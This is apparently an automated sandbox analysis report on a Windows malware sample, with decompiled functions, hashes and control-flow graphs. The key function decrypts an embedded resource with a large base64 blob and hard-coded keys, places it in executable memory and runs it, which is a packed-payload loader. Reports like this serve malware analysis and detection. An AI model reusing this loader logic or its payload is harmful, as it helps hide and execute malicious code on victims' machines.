                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: 7070a3fe0fa6086c9f551fd7d8a3c6d336b33c2bbac2948b2fddc9a39b339380
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: AD90023E71647612024577E0255A98AB8443DE27407454105E002000C24E1095789D37
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00522670, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 4970d059c64eabd8cadc72362520ff4cebec4b1247c0ff7bde963a516075ea7b
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: F590027FA4083251124177E1252BD8AAD043FF3B407455105A081000830C0127549137
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00522630, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: e63b4e34290f6787f2b5c59844ac9c81775d11f171bb365ce12df9ec5d80bfc1
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: 3090023E1004265222017FF4242EB8A68003FEA740F894601A14A405935D101550E437
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005226B0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: ba0796ec6fea80fde8450659bca55a5a762ef2204f9c8da2008d107045c4a71f
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: C090023F60042652030077E0387AF8A69447DF67907464109E005505835D005550A037
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F0000, Relevance: 144.4, Strings: 115, Instructions: 616UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 4f0000-4f000d 1 4f000f-4f0013 0->1 2 4f0015-4f0017 0->2 1->2 3 4f001c-4f0c58 call 4f0db0 1->3 4 4f0da6-4f0da9 2->4 12 4f0c5a-4f0c6e 3->12 13 4f0c90-4f0cbd 3->13 12->13 18 4f0c70-4f0c87 12->18 16 4f0cbf-4f0cc1 13->16 17 4f0cc6-4f0cd0 13->17 16->4 19 4f0ce1-4f0cea 17->19 18->13 25 4f0c89-4f0c8b 18->25 20 4f0cec-4f0d06 19->20 21 4f0d08-4f0d1c 19->21 20->19 24 4f0d2d-4f0d34 21->24 26 4f0d36-4f0d41 24->26 27 4f0d43-4f0d72 24->27 25->4 26->24 29 4f0d76-4f0d78 27->29 30 4f0d7e-4f0d9b 29->30 31 4f0d7a-4f0d7c 29->31 33 4f0d9d-4f0d9f 30->33 34 4f0da1 30->34 31->4 33->4 34->4
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.297130492.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_4f0000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: 2f5a9deaf9fbb80638ca4a23065e0e4be220c43e7066a38862c2380f56b9cc9b
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: C792572090C7DDD9EB32C6788C587DEBEB11B27314F0841D9D1D82A2D2C7BA1B85DB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004084F0, Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 229memoryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 74%
                  			E004084F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				char* _v40;
				long _v44;
				signed int _v48;
				char _v76;
				char* _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _v100;
				intOrPtr _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				intOrPtr _v148;
				char _v149;
				intOrPtr _v156;
				void* _v160;
				signed int _t105;
				signed int _t106;
				intOrPtr _t118;
				void* _t122;
				void* _t123;
				void* _t125;
				intOrPtr _t140;
				void* _t152;
				signed int _t202;
				void* _t203;
				void* _t211;
				void* _t213;

				_t217 = __eflags;
				_t201 = __esi;
				_t200 = __edi;
				_t157 = __ebx;
				_t105 =  *0x44c364; // 0xa6e2bca1
				_t106 = _t105 ^ _t202;
				_v48 = _t106;
				 *[fs:0x0] =  &_v16;
				_v140 = __ecx;
				_v96 = E004080A0(__ebx, __edi, __esi, __eflags, L"kernel32.dll", "FindResourceA");
				_v112 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "LoadResource");
				_v104 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "SizeofResource");
				_v92 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "LockResource");
				_v24 = _v96(0, 0xaf, "VERTKS", _t106,  *[fs:0x0], E00438762, 0xffffffff);
				_v88 = _v112(0, _v24);
				_v84 = _v104(0, _v24);
				_v28 = _v92(_v88);
				_t118 = E004282CD(_t157, _v88, _t200, _v84); // executed
				_v36 = _t118;
				E00428B70(_t157, _t200, _t201, _v36, _v28, _v84);
				E00408A20( &_v76, "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");
				_v8 = 0;
				_v100 = 0;
				_v44 = 0;
				_t122 = E00408AA0( &_v76);
				_t123 = E00408A80( &_v76);
				_t188 =  &_v100;
				E004081A0(_t157,  &_v44, _t201,  &_v100,  &_v44, _t123, _t122); // executed
				_t211 = _t203 - 0x90 + 0x40;
				_v40 = "P7v06hvh#KAn}25";
				_v80 = "x9*sKGTni9T6EWRbP1*M4~fLxMWBU1mHsFZEja5$";
				_t125 = E004083F0(_t217); // executed
				_t218 = _t125;
				if(_t125 == 0) {
					_t140 = E004080A0(_t157, _t200, _t201, _t218, L"kernel32.dll", "VirtualAlloc");
					_t213 = _t211 + 8;
					_v120 = _t140;
					_v144 = _v80;
					_v148 = _v144 + 1;
					do {
						_v149 =  *_v144;
						_v144 = _v144 + 1;
					} while (_v149 != 0);
					_v156 = _v144 - _v148;
					E00408250(_v100, _v80, _v44, _v156);
					_v108 = VirtualAlloc(0, _v84, 0x1000, 0x40);
					E00428B70(_t157, _t200, _t201, _v108, _v36, _v84);
					_v32 = VirtualAlloc(0, _v44, 0x1000, 0x40);
					E00428B70(_t157, _t200, _t201, _v32, _v100, _v44);
					_t188 = _v40;
					_t152 = _v32(_v40, 1, _v108,  &_v84);
					_t211 = _t213 + 0x38;
					if(_t152 == 0) {
						_t188 = _v40;
						_v32(_v40, 0x10, _v108,  &_v84);
						_t211 = _t211 + 0x10;
					}
					_v116 = _v108;
					_v124 = _v116();
				}
				E0041E32C(_t157, _v140, _t188, _t200, L"Local AppWizard-Generated Applications");
				_v132 = E00408810(0x2e4);
				_v8 = 1;
				_t222 = _v132;
				if(_v132 == 0) {
					_v160 = 0;
				} else {
					_v160 = E004065A0(_t157, _t200, _t201, _t222);
				}
				_v128 = _v160;
				_v8 = 0;
				_v20 = _v128;
				 *((intOrPtr*)(_v140 + 0x20)) = _v20;
				 *((intOrPtr*)(_v140 + 0xa4)) = E00406970(_v20);
				 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0x140))))(0xcf8000, 0, 0);
				E00411E2C(_v20, 5);
				E00408830(_v20);
				E00408850(_v20, 0);
				_v136 = 1;
				_v8 = 0xffffffff;
				E00408A60( &_v76);
				 *[fs:0x0] = _v16;
				return E00427DFF(_v136, _t157, _v48 ^ _t202,  *_v20, _t200, _t201, 0x80);
			}















































                  0x004084f0
                  0x004084f0
                  0x004084f0
                  0x004084f0
                  0x00408507
                  0x0040850c
                  0x0040850e
                  0x00408515
                  0x0040851b
                  0x00408533
                  0x00408548
                  0x0040855d
                  0x00408572
                  0x00408584
                  0x00408590
                  0x0040859c
                  0x004085a6
                  0x004085ad
                  0x004085b5
                  0x004085c4
                  0x004085d4
                  0x004085d9
                  0x004085e0
                  0x004085e7
                  0x004085f1
                  0x004085fa
                  0x00408604
                  0x00408608
                  0x0040860d
                  0x00408610
                  0x00408617
                  0x0040861e
                  0x00408623
                  0x00408625
                  0x00408635
                  0x0040863a
                  0x0040863d
                  0x00408643
                  0x00408652
                  0x00408658
                  0x00408660
                  0x00408666
                  0x0040866d
                  0x00408682
                  0x0040869b
                  0x004086b3
                  0x004086c2
                  0x004086da
                  0x004086e9
                  0x004086fb
                  0x004086ff
                  0x00408702
                  0x00408707
                  0x00408713
                  0x00408717
                  0x0040871a
                  0x0040871a
                  0x00408720
                  0x00408726
                  0x00408726
                  0x00408734
                  0x00408743
                  0x00408746
                  0x0040874a
                  0x0040874e
                  0x00408760
                  0x00408750
                  0x00408758
                  0x00408758
                  0x00408770
                  0x00408773
                  0x0040877a
                  0x00408786
                  0x00408797
                  0x004087b9
                  0x004087c0
                  0x004087c8
                  0x004087cf
                  0x004087d7
                  0x004087e1
                  0x004087eb
                  0x004087f9
                  0x0040880e

                  APIs
                    • Part of subcall function 004080A0: LoadLibraryExW.KERNELBASE(00000000,00000000,00000000,?), ref: 0040817D
                  • _malloc.LIBCMT ref: 004085AD
                    • Part of subcall function 004282CD: __FF_MSGBANNER.LIBCMT ref: 004282F0
                    • Part of subcall function 004282CD: __NMSG_WRITE.LIBCMT ref: 004282F7
                    • Part of subcall function 004282CD: RtlAllocateHeap.NTDLL(00000000,8006FFFF,?,00000000,00000000,?,0040B742,8007000E,00000000,?,00415254,0000000C,00000004,00404BDC,8007000E), ref: 00428344
                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,?,?,?,?,?,?,?,?,6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X), ref: 004086B0
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040), ref: 004086D7
                  Strings
                  • kernel32.dll, xrefs: 00408565
                  • Local AppWizard-Generated Applications, xrefs: 00408729
                  • 6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X, xrefs: 004085CC
                  • FindResourceA, xrefs: 00408521
                  • LockResource, xrefs: 00408560
                  • kernel32.dll, xrefs: 00408630
                  • kernel32.dll, xrefs: 00408526
                  • kernel32.dll, xrefs: 00408550
                  • VirtualAlloc, xrefs: 0040862B
                  • LoadResource, xrefs: 00408536
                  • kernel32.dll, xrefs: 0040853B
                  • SizeofResource, xrefs: 0040854B
                  • VERTKS, xrefs: 00408575
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocVirtual$AllocateHeapLibraryLoad_malloc
                  • String ID: 6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X$FindResourceA$LoadResource$Local AppWizard-Generated Applications$LockResource$SizeofResource$VERTKS$VirtualAlloc$kernel32.dll$kernel32.dll$kernel32.dll$kernel32.dll$kernel32.dll
                  • API String ID: 2758549136-1592991391
                  • Opcode ID: b3c2247f901ed3182fb33a2e4e69bee6725a8b1ea1d99a3ad6e6d3759985ae41
                  • Instruction ID: a14d6f866eea3f191c63ddc651d3435c7a81f3ffa1da2a2e890fbe333cfd33b1
                  • Opcode Fuzzy Hash: b3c2247f901ed3182fb33a2e4e69bee6725a8b1ea1d99a3ad6e6d3759985ae41
                  • Instruction Fuzzy Hash: CF9109B1E002189FDB10DBE5CD42BAEBBB4EF48704F10816EE549BB281DB7869448F65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041F197, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 103 41f197-41f1b8 EnterCriticalSection 104 41f1c7-41f1cc 103->104 105 41f1ba-41f1c1 103->105 107 41f1e9-41f1f1 104->107 108 41f1ce-41f1d1 104->108 105->104 106 41f285-41f288 105->106 110 41f290-41f2ae LeaveCriticalSection 106->110 111 41f28a-41f28d 106->111 112 41f1f3-41f206 call 41547b GlobalAlloc 107->112 113 41f208-41f22c GlobalHandle GlobalUnlock call 41547b GlobalReAlloc 107->113 109 41f1d4-41f1d7 108->109 114 41f1e1-41f1e3 109->114 115 41f1d9-41f1df 109->115 111->110 120 41f232-41f234 112->120 113->120 114->106 114->107 115->109 115->114 121 41f236-41f23b 120->121 122 41f259-41f282 GlobalLock call 4281d0 120->122 124 41f24b-41f254 LeaveCriticalSection call 413d98 121->124 125 41f23d-41f245 GlobalHandle GlobalLock 121->125 122->106 124->122 125->124
                  C-Code - Quality: 90%
                  			E0041F197(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x44f9d8
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0x68c680
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E0041547B(_t57, _t59, _t68, _t72, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E0041547B(_t57, _t59, _t68, _t72, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0x68c680
							_t72 =  *_t16;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E00413D98(_t61);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x0
						_v12 = _t40;
						E004281D0(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0x68c680
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0x68c680
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x0
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x1
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0x68c680
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}






















                  0x0041f197
                  0x0041f19c
                  0x0041f19d
                  0x0041f1a0
                  0x0041f1a2
                  0x0041f1a2
                  0x0041f1a7
                  0x0041f1aa
                  0x0041f1b0
                  0x0041f1b0
                  0x0041f1b3
                  0x0041f1b3
